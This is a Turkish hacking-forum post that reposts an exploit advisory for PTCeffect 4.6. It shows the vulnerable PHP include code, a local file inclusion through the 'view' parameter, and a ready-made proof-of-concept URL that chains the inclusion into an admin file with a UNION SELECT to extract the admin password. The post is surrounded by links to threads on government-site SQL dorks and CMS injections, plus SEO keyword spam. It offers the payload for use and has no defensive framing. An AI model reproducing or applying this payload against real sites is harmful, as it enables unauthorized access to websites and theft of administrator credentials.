Konuyu Oyla:
  • Derecelendirme: 4/5 - 3 oy
  • 1
  • 2
  • 3
  • 4
  • 5
PTCeffect LFI & SQL Injection Açıkları
#1
Kod:
# Exploit Title: PTCeffect LFI & SQL Injection Vulnerabilities
# Google Dork: find it :)
# Date: 2014-04-19
# Exploit Author: Walidz
# Software Link: http://www.ptceffect.com/
# Version: 4.6
# Tested on: windows,linux,mac os
# CVE : N/A

The LFI vulnerability is in index.php
  
--------------------[index.php]--------------------
  
if ($input->g['view']) {
        $filename = strtolower($input->g['view']) . ".php";
  
[...]
  
  
include SOURCES . $filename;
  
  
--------------------[index.php]--------------------
  
So you can include a fil by doing ; http://[site]/index.php?view=[file]
  
  
By using the LFI, you can also include "admin files" which are especially unsecure, and let you inject SQL queries.
  
As the file admin/sources/edit_loginad.php
  
  
PoC ; http://[site]/index.php?view=../admin/Sources/edit_loginad&edit=-1%20union%20select%201,2,3,4,%28SELECT%20password%20FROM%20admin%29,6,7,8,9--%20-

Kaynak =>
Kod:
http://www.exploit-db.com/exploits/32941/
www.deccal.org


Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  Gov SQL Dorks Devlet Açıkları KingSkrupellos 247 11,927 24-11-2016, Saat: 13:02
Son Yorum: Trajedi
  創意細胞 SQL Injection H4Sec 27 740 10-03-2016, Saat: 18:37
Son Yorum: byhacı
  Israelian CMS Blind SQL Injection Vulnerability H4Sec 16 1,102 01-03-2016, Saat: 03:59
Son Yorum: Zany
  Tss-Est CMS Suriye SQL Enjeksiyon ve Yöneticiyi Atlatma Açıkları KingSkrupellos 0 137 23-01-2016, Saat: 03:01
Son Yorum: KingSkrupellos
  Joomla Nice Ajax Poll 1.4.0 SQL Injection ERTUĞRUL 0 123 12-12-2015, Saat: 03:08
Son Yorum: ERTUĞRUL
Anahtar Kelimeler

PTCeffect LFI & SQL Injection Açıkları indir, PTCeffect LFI & SQL Injection Açıkları Videosu, PTCeffect LFI & SQL Injection Açıkları Online izle, PTCeffect LFI & SQL Injection Açıkları Bedava indir, PTCeffect LFI & SQL Injection Açıkları Yükle, PTCeffect LFI & SQL Injection Açıkları Hakkında, PTCeffect LFI & SQL Injection Açıkları Nedir, PTCeffect LFI & SQL Injection Açıkları Free indir, PTCeffect LFI & SQL Injection Açıkları Oyunu, PTCeffect LFI & SQL Injection Açıkları Download


1 Ziyaretçi